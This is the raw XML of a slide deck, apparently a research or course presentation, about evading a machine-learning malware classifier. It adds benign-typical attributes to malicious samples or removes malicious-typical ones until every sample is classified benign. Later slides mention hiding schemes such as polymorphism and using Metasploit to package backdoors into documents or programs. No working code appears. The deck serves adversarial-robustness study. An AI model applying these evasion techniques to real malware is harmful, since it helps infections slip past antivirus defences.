          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8049193" y="3804269"/>
            <a:ext cx="1719609" cy="2185017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Elbow Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3205725" y="1505184"/>
            <a:ext cx="271337" cy="1801737"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Multiply 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6198118" y="1905000"/>
            <a:ext cx="1542173" cy="14162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modification strategy (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="986117" y="2161309"/>
            <a:ext cx="11044518" cy="4382926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For every attribute X(1~530) in the training set, compute:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Positive   Ratio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>PR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(benign instances that have attribute X) 								 	  /(total benign instances)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Negative Ratio(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>NR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>instances </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>that have attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>X) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>								</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  /(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>total malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>instances)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Relative  Ratio (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PR - NR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Sort all attributes by RR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: attribute X appears more often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: attribute X appears more often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13348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modification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>strategy (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2121868" y="1434353"/>
            <a:ext cx="10070132" cy="5423647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> instance in the test set:  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>attributes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>that have top n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>highest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>RRs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>     or</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>attributes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>that have top n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lowest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>RRs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Add: making virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Remove: making virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482436" y="6239562"/>
            <a:ext cx="10598727" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: attribute X appears more often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>samples; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: attribute X appears more often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> samples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49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Adding Highest N Attributes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285" y="1264555"/>
            <a:ext cx="7302603" cy="5465072"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>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02874" y="3193929"/>
            <a:ext cx="3603475" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17.3%(13/75)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are classified </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as +1!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4115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383922" cy="1280890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Test Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: Removing Lowest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>N Attributes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796" y="1264555"/>
            <a:ext cx="7474139" cy="5593445"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>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702874" y="3193929"/>
            <a:ext cx="3603475" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17.3%(13/75)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are classified </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as +1!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14890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Combined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7474139" cy="5593445"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5235388" y="3174976"/>
            <a:ext cx="4285130" cy="7024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0518" y="2545445"/>
            <a:ext cx="3603475" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Removing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attributes is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more efficient!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9536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Existing Hiding Schemes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Our strategy is close to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>combination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> of two existing hiding schemes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Disguise as popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>formats/programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Polymorphic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Single scheme above is not effective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> against modern antivirus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220153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Disguise as Popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ile Formats or Programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Useful tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Community Edition penetration-testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ackage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>exploits or backdoors into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>files (.doc, .pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>) or programs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>notepad.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>calc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
